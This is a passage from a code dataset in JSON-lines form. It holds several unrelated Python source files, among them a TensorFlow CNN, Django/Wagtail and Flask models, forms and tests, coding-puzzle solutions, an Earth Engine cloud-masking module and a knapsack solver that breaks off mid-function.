self.fclayer5 = tf.contrib.layers.fully_connected(self.h_drop4, 512, activation_fn=tf.nn.relu)\n # self.h_drop5 = tf.nn.dropout(self.fclayer5, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer6\"):\n # self.fclayer6 = tf.contrib.layers.fully_connected(self.h_drop5, 2500, activation_fn=tf.nn.relu)\n # self.h_drop6 = tf.nn.dropout(self.fclayer6, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer7\"):\n # self.fclayer7 = tf.contrib.layers.fully_connected(self.h_drop6, 1250, activation_fn=tf.nn.relu)\n # self.h_drop7 = tf.nn.dropout(self.fclayer7, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer8\"):\n # self.fclayer8 = tf.contrib.layers.fully_connected(self.h_drop7, 625, activation_fn=tf.nn.relu)\n # self.h_drop8 = tf.nn.dropout(self.fclayer8, self.dropout_keep_prob)\n\n with tf.name_scope(\"output_layer\"):\n self.predictions = tf.contrib.layers.fully_connected(self.h_drop4, num_outputs, activation_fn=None)\n \n with tf.name_scope(\"RMSE\"):\n self.rmse = tf.sqrt(tf.reduce_mean(tf.square(self.predictions - self.input_y)))\n\n with tf.name_scope(\"cost\"):\n self.cost = tf.reduce_mean(tf.square(self.predictions - self.input_y))\n tf.summary.scalar(\"cost\", 
self.cost)\n","sub_path":"mimic_cnn_class.py","file_name":"mimic_cnn_class.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"110700463","text":"from django.db import models\n\n# Create your models here.\nfrom zinnia.models_bases import entry\n\n\nclass Picture(models.Model):\n title = models.CharField(max_length=50)\n image = models.ImageField(upload_to='gallery')\n\n\nclass Gallery(models.Model):\n title = models.CharField(max_length=50)\n pictures = models.ManyToManyField(Picture)\n\n\nclass EntryGallery(\n entry.CoreEntry,\n entry.ContentEntry,\n entry.DiscussionsEntry,\n entry.RelatedEntry,\n entry.ExcerptEntry,\n entry.FeaturedEntry,\n entry.AuthorsEntry,\n entry.CategoriesEntry,\n entry.TagsEntry,\n entry.LoginRequiredEntry,\n entry.PasswordRequiredEntry,\n entry.ContentTemplateEntry,\n entry.DetailTemplateEntry\n):\n # image = models.ForeignKey(Picture)\n gallery = models.ForeignKey(Gallery)\n\n def __str__(self):\n return 'EntryGallery %s' % self.title\n\n class Meta(entry.CoreEntry.Meta):\n abstract = True\n","sub_path":"blogimages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640979712","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django import forms\n\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom modelcluster.fields import ParentalKey\n\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.search import index\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\n\n@register_snippet\nclass BlogAuthor(models.Model):\n name = models.CharField(max_length=255)\n icon = models.ForeignKey(\n \"wagtailimages.Image\", null=True, blank=True,\n on_delete=models.SET_NULL, related_name=\"+\"\n )\n\n panels = [\n FieldPanel(\"name\"),\n ImageChooserPanel(\"icon\"),\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"blog authors\"\n\n# Create your models here.\nclass EventsIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n eventpages = self.get_children().live().order_by(\"-first_published_at\")\n context[\"eventpages\"] = eventpages\n return context\n\n content_panels = Page.content_panels + [\n FieldPanel(\"intro\"),\n ]\n\n# Still need to add event image field\nclass EventPage(Page):\n parent_page_types = ['blog.EventsIndexPage']\n gig_date = models.DateField(default=timezone.now)\n gig_time = models.CharField(default=\"19:30\", max_length=5)\n gig_location = models.CharField(default=\"Location TBA\", max_length=200)\n location_link = models.CharField(max_length=2083, default=\"https://www.uptheantics.co.uk\")\n ticket_link = models.CharField(max_length=2083, default=\"https://www.uptheantics.co.uk\")\n price = models.CharField(max_length=6, default=\"5\")\n intro = models.CharField(max_length=100)\n body = 
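The SignalCNN record above is written against tf.layers and tf.contrib, neither of which is available in TensorFlow 2.x. A hedged sketch of the same multi-kernel-width, two-conv-block pattern in the tf.keras functional API (a rough equivalent, not the author's code; assumes signal_length is large enough for the chosen filter sizes):

import tensorflow as tf

def conv_branch(inputs, filter_size, num_filters, dropout_rate):
    # One branch per filter size: conv -> pool -> dropout, twice, then flatten.
    x = tf.keras.layers.Conv2D(num_filters, (2, filter_size), activation='relu')(inputs)
    x = tf.keras.layers.MaxPooling2D(pool_size=(1, 2), strides=(1, 1))(x)
    x = tf.keras.layers.Dropout(dropout_rate)(x)
    x = tf.keras.layers.Conv2D(num_filters, (1, filter_size), activation='relu')(x)
    x = tf.keras.layers.MaxPooling2D(pool_size=(1, 2), strides=(1, 1))(x)
    x = tf.keras.layers.Dropout(dropout_rate)(x)
    return tf.keras.layers.Flatten()(x)

def build_signal_cnn(signal_length, num_outputs, filter_sizes, num_filters, dropout_rate=0.5):
    inputs = tf.keras.Input(shape=(2, signal_length, 1))
    branches = [conv_branch(inputs, fs, num_filters, dropout_rate) for fs in filter_sizes]
    x = tf.keras.layers.Concatenate()(branches) if len(branches) > 1 else branches[0]
    for units in (8192, 4096, 2048, 1024):  # mirrors the dense stack above
        x = tf.keras.layers.Dense(units, activation='relu')(x)
        x = tf.keras.layers.Dropout(dropout_rate)(x)
    outputs = tf.keras.layers.Dense(num_outputs)(x)  # linear head for regression
    model = tf.keras.Model(inputs, outputs)
    model.compile(optimizer='adam', loss='mse',
                  metrics=[tf.keras.metrics.RootMeanSquaredError()])
    return model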
RichTextField(blank=True)\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n FieldPanel(\"gig_date\"),\n FieldPanel(\"gig_time\"),\n FieldPanel(\"gig_location\"),\n FieldPanel(\"price\"),\n MultiFieldPanel([\n FieldPanel(\"location_link\"),\n FieldPanel(\"ticket_link\"),\n ], heading=\"Relevant Links\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n ImageChooserPanel('representative_image'),\n ]\n\nclass BlogIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n all_posts = self.get_children().live().type(BlogPage).order_by(\"-first_published_at\")\n recent_posts = all_posts[:10]\n context[\"recent_posts\"] = recent_posts\n context[\"all_posts\"] = all_posts\n subpage_types = [\"Blog\"]\n return context\n\nclass BlogArchives(Page):\n def get_context(self, request):\n context = super(BlogArchives, self).get_context(request)\n\n # Get the full unpaginated listing of resource pages as a queryset -\n blogpages = self.get_siblings(inclusive=False).live().order_by(\"-first_published_at\")[9:]\n\n paginator = Paginator(blogpages, 10) # Show 5 resources per page\n\n page = request.GET.get('page')\n try:\n blogpages = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n blogpages = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n blogpages = paginator.page(paginator.num_pages)\n\n # make the variable 'resources' available on the template\n context['blogpages'] = blogpages\n\n return context\n\n def __str__(self):\n return self.name\n\nclass BlogPage(Page):\n parent_page_types = ['blog.BlogIndexPage']\n date = models.DateField(default=timezone.now)\n intro = models.CharField(max_length=250)\n body = RichTextField(blank=True)\n author = models.ForeignKey(\n \"blog.BlogAuthor\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n def main_image(self):\n gallery_item = self.gallery_images.first()\n if gallery_item:\n return gallery_item.image\n else:\n return None\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n SnippetChooserPanel(\"author\"),\n ], heading=\"Blog information\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n InlinePanel(\"gallery_images\", label=\"Gallery Images\"),\n ImageChooserPanel('representative_image'),\n ]\n\nclass BlogPageGalleryImage(Orderable):\n page = ParentalKey(BlogPage, on_delete=models.CASCADE, related_name=\"gallery_images\")\n image = models.ForeignKey(\n \"wagtailimages.Image\", on_delete=models.CASCADE, related_name=\"+\"\n )\n caption = models.CharField(blank=True, max_length=250)\n\n panels = [\n ImageChooserPanel(\"image\"),\n FieldPanel(\"caption\")\n ]\n\nclass AboutPage(Page):\n date = models.DateField(default=timezone.now)\n intro = models.CharField(max_length=250)\n body = 
RichTextField(blank=True)\n\n def main_image(self):\n gallery_item = self.gallery_images.first()\n if gallery_item:\n return gallery_item.image\n else:\n return None\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel(\"date\"),\n ], heading=\"Page information\"),\n MultiFieldPanel([\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n ], heading=\"Page Content\"),\n ]\n\n def child_pages(self):\n return AboutPage.objects.live().child_of(self).order_by(\"title\")\n\n# Does this need to take in Page as a param? It's just data being handed to About\nclass Bio(Page):\n name = models.CharField(max_length=100)\n description = RichTextField(blank=True)\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel(\"name\"),\n FieldPanel(\"description\", classname=\"full\"),\n ImageChooserPanel('representative_image'),\n ], heading=\"Bio\")\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"bios\"\n","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8432937","text":"from app.mod_blog.models import Blog\nimport pytest\nfrom app import app\nimport string\nimport random\n\n\n@pytest.fixture\ndef client(request):\n test_client = app.test_client()\n\n return test_client\n\n\ndef id_generator(size=10, chars=string.ascii_letters + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef test_index(client):\n \"\"\"\n GIVEN a Flask test client\n WHEN the '/' page is requested (GET)\n THEN check the status code is valid\n \"\"\"\n response = client.get('/')\n assert response.status_code == 200\n\n\ndef test_new_article_instance():\n \"\"\"\n GIVEN a Blog Model\n WHEN a new Blog is created\n THEN check the title and description are defined correctly\n \"\"\"\n\n blog = Blog(\"New Article\", \"Article's description\")\n assert blog.title == \"New Article\"\n assert blog.body == \"Article's description\"\n\n\ndef test_adding_article_db():\n \"\"\"\n Given a Blog Model\n WHEN a new blog is added to the db\n THEN check the title and description are defined correctly from the DB\n \"\"\"\n id = id_generator()\n added_blog = Blog(f\"New Article {id}\", \"Article's description\").save()\n \n blog = Blog.query.filter_by(title=f\"New Article {id}\").first()\n\n assert added_blog.id == blog.id\n assert added_blog.title == blog.title\n assert added_blog.body == blog.body\n assert added_blog.date_created == blog.date_created\n assert added_blog.date_modified == blog.date_modified\n\n added_blog.remove()\n\n\ndef test_removing_article_db():\n \"\"\"\n GIVEN a Blog Model\n WHEN a blog article is removed from the db\n THEN check the article is no more in the db\n \"\"\"\n\n id = id_generator()\n added_blog = Blog(f\"Article being removed {id}\", \"Article's description\")\\\n .save()\n added_blog.remove()\n\n removed_blog = Blog.query.filter_by(title=f\"Article being removed {id}\")\\\n .first()\n\n assert removed_blog is None\n\n","sub_path":"tests/test_blog.py","file_name":"test_blog.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456785953","text":"IN = [x.split(\"\\n\")[0] for x in open(\"input10.txt\", 
\"r\").readlines()]\r\nIN = [[char for char in IN[i]] for i in range(len(IN))]\r\n\r\n\r\ndef isInSight(pos1, pos2):\r\n points = abs(pgcd(pos2[0] - pos1[0], pos2[1] - pos1[1])) - 1\r\n if (points == -1 or points == 0):\r\n return 1\r\n increX = (pos2[0] - pos1[0]) / (points + 1)\r\n increY = (pos2[1] - pos1[1]) / (points + 1)\r\n\r\n cx = pos1[0]\r\n cy = pos1[1]\r\n for i in range(points):\r\n cx += increX\r\n cy += increY\r\n if (IN[int(cy)][int(cx)] != \".\"):\r\n return 0\r\n return 1\r\n\r\n\r\ndef pgcd(a, b):\r\n if b == 0:\r\n return a\r\n else:\r\n r = a % b\r\n return pgcd(b, r)\r\n\r\n\r\ndef toString():\r\n s = \"\"\r\n for y in range(h):\r\n for x in range(w):\r\n s += str(IN[y][x]) + \" \"\r\n s += \"\\n\"\r\n print(s)\r\n\r\n\r\nh = len(IN)\r\nw = len(IN[0])\r\n\r\ntoString()\r\n\r\nfor y in range(h):\r\n for x in range(w):\r\n if IN[y][x] != \".\":\r\n sum = 0\r\n for j in range(h):\r\n for i in range(w):\r\n if IN[j][i] != \".\" and (i != x or y != j):\r\n sum += isInSight((x, y), (i, j))\r\n IN[y][x] = str(sum)\r\n\r\nmax = 0\r\nfor y in range(h):\r\n for x in range(w):\r\n if IN[y][x] != \".\" and int(IN[y][x]) > max:\r\n max = int(IN[y][x])\r\n\r\ntoString()\r\n\r\nprint(max)","sub_path":"day10_2.py","file_name":"day10_2.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484719151","text":"class Solution:\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[1] * (m + 1) for i in range(n + 1)]\n for i in range(2, n+1):\n for j in range(2, m+1):\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[-1][-1]\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.uniquePaths(7, 3)\n print(result)","sub_path":"0-100/62_unique_path.py","file_name":"62_unique_path.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169976740","text":"import pandas as pd\nfrom pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom skl2onnx import convert_sklearn\nfrom skl2onnx.common.data_types import FloatTensorType\n\ndata = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', sep=\",\",\n names=['sepal length in cm', 'sepal width in cm', 'petal length in cm', 'petal width in cm',\n 'class'])\n\ndescription = data.describe()\nprint(description)\nscatter_matrix(data)\nfigure = plt.gcf()\nfigure.set_size_inches(10, 10)\nplt.savefig(\"../images/sample.png\", dpi=100)\n\narray = data.values\nx = array[:, 0:4]\ny = array[:, 4]\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=2020)\n\nlr = LogisticRegression(penalty='l2', random_state=2020, solver='liblinear')\nlr.fit(x_train, y_train)\n\nscore = lr.score(x_test, y_test)\n\nprint('score:', score)\n\ninitial_type = [('float_input', FloatTensorType([None, 4]))]\nonx = convert_sklearn(lr, initial_types=initial_type)\nwith open(\"../model/rf_iris.onnx\", \"wb\") as f:\n f.write(onx.SerializeToString())\n","sub_path":"P_Iris/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448794565","text":"import logging\nimport os\n\nfrom . import utils_config\nfrom . import utils_module_dir\nfrom . 
import utils_shell\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef handle_pull_code(search_in=None, **ignore):\n utils_shell.execute('python2.7 -m devenv revert-patch %s' % (search_in or ''), shell=True)\n for module_dir, _ in utils_module_dir.search(search_in):\n code_dir = os.path.join(module_dir, 'code')\n if not os.path.exists(code_dir):\n continue\n module_config = utils_config.read(os.path.join(module_dir, 'supervisord.conf'))\n code_type = module_config.get_option_or_exit('code', 'type')\n if code_type == 'svn':\n utils_shell.execute('svn up', cwd=code_dir, shell=True)\n elif code_type == 'git':\n branch = module_config.get_option_or_exit('code', 'branch')\n utils_shell.execute('git pull origin %s' % branch, cwd=code_dir, shell=True)\n else:\n LOGGER.error('not supported version control: %s' % code_type)\n\n\n","sub_path":"devenv/handle_pull_code.py","file_name":"handle_pull_code.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46596195","text":"import time\nimport traceback\nimport os\nfrom chatbase import Message, MessageSet, MessageTypes, InvalidMessageTypeError\n\n\nclass ChatBasePublisher:\n\n def __init__(self):\n self.api_key=os.environ[\"CHAT_BASE_API_KEY\"] # Chatbase API key\n self.platform = 'lord_lewin_chatbot' # Chat platform name\n # message_user = 'Do you know the time, please?' # User message\n # message_bot = 'It's 12 o'clock!' # Bot response message\n self.version = '1' # Bot version, useful if you want to mark them for A/B testing or compare results across versions\n # time_stamp = int(round(time.time() * 1e3)) # Mandatory\n\n def publish(self,userQuery,botResponse,not_handled,userId,intent):\n time_stamp = int(round(time.time() * 1e3)) # Mandatory\n \n # Create an instance of MessageSet to collect all the messages\n message_set = MessageSet(api_key=str(self.api_key), platform=self.platform,\n version=self.version, user_id=userId)\n # Create an instance of Message for the user message and set values in the constructor\n msg1 = Message(api_key=self.api_key, platform=self.platform, message=userQuery,\n intent=intent, version=self.version, user_id=userId,\n type=MessageTypes.USER, not_handled=not_handled,\n time_stamp=time_stamp)\n # msg1.set_as_feedback()\n\n # Create an instance of Message for the bot response message and set values in the constructor\n msg2 = Message(api_key=self.api_key, platform=self.platform, message=botResponse,\n version=self.version, user_id=userId,\n type=MessageTypes.AGENT)\n\n # Push messages into the collection (MessageSet)\n message_set.append_message(msg1)\n message_set.append_message(msg2)\n\n \n # Send the messages\n response = message_set.send()\n print('Response code for sending Chatbase Message', response.content)\n # response.status_code will be 200 if sending worked","sub_path":"docker/keras-chat-engine/app/analytics/chatbasepublisher.py","file_name":"chatbasepublisher.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389839370","text":"# coding:utf-8\nfrom django.shortcuts import render_to_response\nfrom .models import *\n\n\ndef list(request):\n statue = \"列表展示页\"\n table_list = Server.objects.all()\n return render_to_response(\"list.html\", locals())\n\n\ndef content(request):\n statue = \"服务器详情页\"\n host_data = {\n \"host_name\": \"bian-PC\",\n \"ip\": \"192.168.0.14\",\n \"mac\": \"00-00-00-00-00-00-00-E0\",\n \"cpu\": \" 
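handle_pull_code.py above delegates to utils_shell.execute, which is not included in the record. A plausible minimal implementation (hypothetical; the real module may differ) built on subprocess:

import logging
import subprocess

LOGGER = logging.getLogger(__name__)

def execute(command, cwd=None, shell=False):
    # Run the command, raise on a non-zero exit code, and return its output;
    # matches the call sites above, which pass command strings with shell=True.
    LOGGER.info('executing: %s (cwd=%s)', command, cwd)
    result = subprocess.run(command, cwd=cwd, shell=shell, check=True,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return result.stdout.decode('utf-8', errors='replace')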
Intel(R) Xeon(R) CPU E5-2650 v2 @ 2.60GHz\",\n \"mem\": \"12G\",\n \"disk\": \"500G\",\n \"system\": \"windows7\",\n \"model\": \"Thinkpad E431\"\n }\n return render_to_response(\"server_content.html\", locals())\n","sub_path":"ProjOMMP/Server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313638451","text":"def findMaxConsecutiveOnes(nums):\n max = 0\n temp = 0\n for n in nums:\n if n == 1:\n temp += 1\n if temp > max:\n max = temp\n else:\n temp = 0\n return max\n\n\nprint(findMaxConsecutiveOnes([1, 1, 0, 1, 1, 1]))\n","sub_path":"Python/Easy/maxConsecutiveOnes.py","file_name":"maxConsecutiveOnes.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501401736","text":"import ee\nfrom sepal.ee.image import select_and_add_missing\n\nfrom ..image_operation import ImageOperation\n\n\ndef mask_clouds(mosaic_def, collection):\n if not mosaic_def.mask_clouds:\n reduced = collection.select('cloud') \\\n .reduce(ee.Reducer.sum()\n .combine(ee.Reducer.count(), \"\", True)\n .combine(ee.Reducer.min(), \"\", True))\n # Proportion of pixels that are cloudy\n cloud_proportion = select_and_add_missing(reduced, ['cloud_sum']) \\\n .divide(select_and_add_missing(reduced, ['cloud_count']))\n # A representative proportion of pixels that are cloudy cloudy for the neighborhood\n normal_cloud_proportion = cloud_proportion.reproject(crs='EPSG:4326', scale=10000) \\\n .max(cloud_proportion.reproject(crs='EPSG:4326', scale=20000))\n # Measure of how a locations cloud proportion differs from the general area\n cloud_proportion_diff = cloud_proportion.subtract(normal_cloud_proportion)\n only_clouds = select_and_add_missing(reduced, ['cloud_min'])\n\n # When there is higher proportion of clouds than the normally, keep the clouds.\n # It's probably something (typically buildings) misclassified as clouds.\n # Also, don't trust the cloud classification enough to completely mask area with only clouds\n # Desert sand can be classified as cloud.\n keep_clouds = cloud_proportion_diff.gt(0.4).And(normal_cloud_proportion.lt(0.3))\n keep_clouds = keep_clouds.Or(only_clouds)\n else:\n keep_clouds = False\n\n return collection.map(lambda image: _MaskClouds(image, mosaic_def).apply(keep_clouds))\n\n\nclass _MaskClouds(ImageOperation):\n def __init__(self, image, mosaic_def):\n super(_MaskClouds, self).__init__(image)\n self.mosaic_def = mosaic_def\n\n def apply(self, keep_clouds):\n cloud_free = self.toImage('!i.cloud')\n buffer_meters = self.mosaic_def.cloud_buffer\n if buffer_meters:\n cloud_free = buffer_mask(self.toImage('!i.cloud'), buffer_meters).And(cloud_free)\n to_mask = self.image.select('toMask')\n if keep_clouds:\n mask = to_mask.Not().And(cloud_free.Or(keep_clouds))\n else:\n mask = to_mask.Not().And(cloud_free)\n return self.image.updateMask(mask)\n\n\ndef buffer_mask(mask, meters):\n cloud = mask.Not()\n min_cloud_radius = 50\n\n # Clouds with radius < min_cloud_radius will not have any inner pixels, and will not get buffered\n inner_pixel = mask \\\n .fastDistanceTransform(256, 'pixels').sqrt() \\\n .multiply(ee.Image.pixelArea().sqrt()) \\\n .gt(min_cloud_radius) \\\n .And(cloud)\n\n distance_to_inner_pixel = inner_pixel \\\n .fastDistanceTransform(256, 'pixels').sqrt() \\\n .multiply(ee.Image.pixelArea().sqrt())\n\n return distance_to_inner_pixel \\\n 
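The loop in maxConsecutiveOnes.py above tracks the current run length by hand; itertools.groupby gives an equivalent one-liner, handy as a cross-check:

from itertools import groupby

def max_consecutive_ones(nums):
    # Longest run of adjacent 1s; default=0 covers an empty or all-zero list.
    return max((sum(1 for _ in g) for k, g in groupby(nums) if k == 1), default=0)

assert max_consecutive_ones([1, 1, 0, 1, 1, 1]) == 3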
.lt(ee.Number(meters).add(min_cloud_radius)) \\\n .Or(cloud) \\\n .Not()\n","sub_path":"modules/google-earth-engine/docker/src/sepalinternal/mosaic/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633822408","text":"import sys, os, argparse\n\nimport job_queue\n\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser(description='Submit job scripts')\n parser.add_argument('job_script', nargs='+')\n parser.add_argument('--array', '-a')\n return parser.parse_args(argv)\n\n\ndef main(argv):\n args = parse_args(argv)\n for job_script in args.job_script:\n queue = job_queue.get_job_queue(job_script)\n work_dir = os.path.dirname(job_script)\n job_id = queue.submit_job(job_script, work_dir=work_dir, array_idx=args.array)\n print(job_id)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"submit_job.py","file_name":"submit_job.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408351033","text":"#! /usr/bin/env python\n\nfrom portals.permissions import permissions_check, superuser_required\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import HttpResponse, render\n\nfrom .forms import VendorForm\nfrom .models import Vendor\n\n@login_required\n@permissions_check()\ndef index(request):\n\n vendor_find = []\n temp_name = \"cmdb/cmdb-header.html\"\n vendors = Vendor.objects.all()\n vendor_find = Vendor.objects.all()\n \n return render(request, 'cmdb/vendor.html', locals())\n\n@login_required\n@permissions_check()\ndef vendor_add(request):\n temp_name = \"cmdb/cmdb-header.html\"\n if request.POST:\n vendor_form = VendorForm(request.POST)\n if vendor_form.is_valid():\n vendor_form.save()\n tips = '厂商增加成功'\n display_control = ''\n else:\n tips = '厂商增加失败'\n display_control = ''\n return render(request, \"cmdb/vendor_add.html\", locals())\n else:\n display_control = 'none'\n vendor_form = VendorForm()\n return render(request, 'cmdb/vendor_add.html', locals())\n\n@login_required\n@permissions_check()\ndef vendor_edit(request, ids):\n status = 0\n\n obj = Vendor.objects.filter(id=ids)\n if len(obj) == 1:\n obj = obj[0]\n else:\n obj = None\n\n if request.method == 'POST':\n af = VendorForm(request.POST, instance=obj)\n if af.is_valid():\n af.save()\n status = 1\n else:\n status = 2\n else:\n af = VendorForm(instance=obj)\n\n return render(request, 'cmdb/vendor_edit.html', locals())\n\n\n@login_required()\n@permissions_check()\ndef vendor_del(request):\n vendor_id = request.GET.get('id', '')\n if vendor_id:\n Vendor.objects.filter(id=vendor_id).delete()\n\n if request.method == 'POST':\n vendor_batch = request.GET.get('arg', '')\n vendor_id_all = str(request.POST.get('vendor_id_all', ''))\n\n if vendor_batch:\n for vendor_id in vendor_id_all.split(','):\n vendor_item = HostGroup.objects.filter(id=vendor_id)\n if len(vendor_item) == 1:\n vendor_item = vendor_item[0]\n else:\n vendor_item = None\n vendor_item.delete()\n\n return HttpResponse('厂商删除成功')","sub_path":"cmdb/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109222506","text":"# 217 contains-duplicate/\nclass Solution(object):\n def containsDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n d={}\n for x in 
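buffer_mask in clouds.py above grows the cloud mask by a metric distance using Earth Engine's fastDistanceTransform. For a plain in-memory raster, the same idea can be sketched with scipy (assumes square pixels of known size; this is an analogue, not the module's API):

import numpy as np
from scipy.ndimage import distance_transform_edt

def buffer_cloud_mask(clear_mask, meters, pixel_size_m):
    # clear_mask: boolean array, True where a pixel is cloud-free.
    # Distance from each clear pixel to the nearest cloudy pixel, in meters.
    dist_to_cloud = distance_transform_edt(clear_mask) * pixel_size_m
    # Keep only clear pixels farther than the buffer from any cloud.
    return dist_to_cloud > meters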
nums:\n            if x in d: return True\n            d[x]=''\n\n        return False\n","sub_path":"217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"527012938","text":"from flask_wtf import CSRFProtect, FlaskForm, RecaptchaField\nfrom wtforms.fields import TextAreaField\nfrom wtforms.fields.html5 import EmailField\nfrom wtforms.validators import DataRequired, Email\n\ncsrf = CSRFProtect()\n\nclass SubscribeForm(FlaskForm):\n    email = EmailField(\n        label='Subscribe for the latest and greatest!',\n        validators=[DataRequired(), Email()],\n        id='subscribe-email',\n        render_kw={'placeholder': 'Email'}\n    )\n\nclass ContactForm(FlaskForm):\n    sender = EmailField(\n        validators=[DataRequired(), Email()],\n        id='contact-sender',\n        render_kw={'placeholder': 'Email'}\n    )\n    body = TextAreaField(\n        validators=[DataRequired()],\n        id='contact-body',\n        render_kw={\n            'placeholder': 'Message',\n            'rows': '5'\n        }\n    )\n    captcha = RecaptchaField()\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515365491","text":"#!/usr/bin/env python\nimport sys\n\"\"\"\nThe 0/1 Knapsack Problem\n\nGiven a set of items, each with a weight and a value, and a\nknapsack with a max weight, which subset of items has the\nhighest value without exceeding the max weight of the\nknapsack?\n\nOptimal substructure: given the set of all items S and a subset\nS' that is optimal for the given knapsack weight, S' must still\nbe optimal if an item is removed from both it and S.\n\n\n\"\"\"\n\ndef knapsack(items, sack):\n    \"\"\"\n    items = [(v,w),(v,w)]\n    sack = int\n    \"\"\"\n    A = [[0] * len(items) for x in range(sack+1)]\n    for i in range(0, len(items)):\n        for j in range(0, sack+1):\n            if items[i][1] > j:\n                A[j][i] = A[j][i-1]\n            else:\n                A[j][i] = max(A[j][i-1], A[j-items[i][1]][i-1] + items[i][0])\n    return A\n\ndef recursive_knapsack(items, size):\n    cache = {}\n    def inner(items, size, totalItems, currentItem, cache):\n        if currentItem >= totalItems or size <= 0:\n            return 